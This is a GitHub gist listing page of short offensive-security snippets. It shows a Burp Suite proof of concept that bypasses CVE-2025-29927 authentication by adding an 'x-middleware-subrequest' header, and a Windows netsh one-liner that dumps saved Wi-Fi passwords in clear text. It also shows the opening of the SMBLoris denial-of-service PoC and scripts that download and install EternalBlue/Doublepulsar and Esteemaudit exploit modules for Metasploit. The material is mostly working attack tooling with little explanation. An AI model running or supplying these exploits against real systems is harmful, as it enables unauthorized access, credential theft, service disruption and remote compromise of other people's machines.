Pedro Joaquín hkm
hkm
/ CVE-2025-29927.bambda
Created
May 30, 2025 18:18
CVE-2025-29927 Proof of Concept Custom Burp Suite Action
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var req = requestResponse.request(); | |
| logging().logToOutput(api().http().sendRequest(req.withRemovedHeader("Authorization").withRemovedHeader("Cookie").withAddedHeader("x-middleware-subrequest", "middleware")).response().statusCode()); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content" |
hkm
/ smbloris.c
Created
August 29, 2017 23:37
— forked from marcan/smbloris.c
SMBLoris attack proof of concept
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* SMBLoris attack proof-of-concept | |
| * | |
| * Copyright 2017 Hector Martin "marcan" <marcan@marcan.st> | |
| * | |
| * Licensed under the terms of the 2-clause BSD license. | |
| * | |
| * This is a proof of concept of a publicly disclosed vulnerability. | |
| * Please do not go around randomly DoSing people with it. | |
| * | |
| * Tips: do not use your local IP as source, or if you do, use iptables to block |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget https://www.exploit-db.com/download/42315 -O eternal2016.py | |
| wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py | |
| touch __INIT__.py |
hkm
/ eternalblue-x86-install.sh
Created
August 20, 2017 19:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apt-get update -y | |
| apt-get upgrade -y | |
| apt-get install wine -y | |
| apt-get install winetricks -y | |
| dpkg --add-architecture i386 && apt-get update && apt-get install wine32 -y | |
| git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit | |
| cd Eternalblue-Doublepulsar-Metasploit/ | |
| cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb | |
| mkdir -p /root/.wine/drive_c/ |
hkm
/ esteemaudit-install.sh
Created
August 8, 2017 15:25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dpkg --add-architecture i386 | |
| apt-get update && apt-get install wine32 git | |
| git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit | |
| mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp/ | |
| cp Esteemaudit-Metasploit/esteemaudit.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/ | |
| mkdir /usr/share/esteemaudit/ | |
| cp Esteemaudit-Metasploit/files/* /usr/share/esteemaudit/ | |
| wine /usr/share/esteemaudit/Esteemaudit-2.1.0.exe 2>0 | |
| rm -rf Esteemaudit-Metasploit |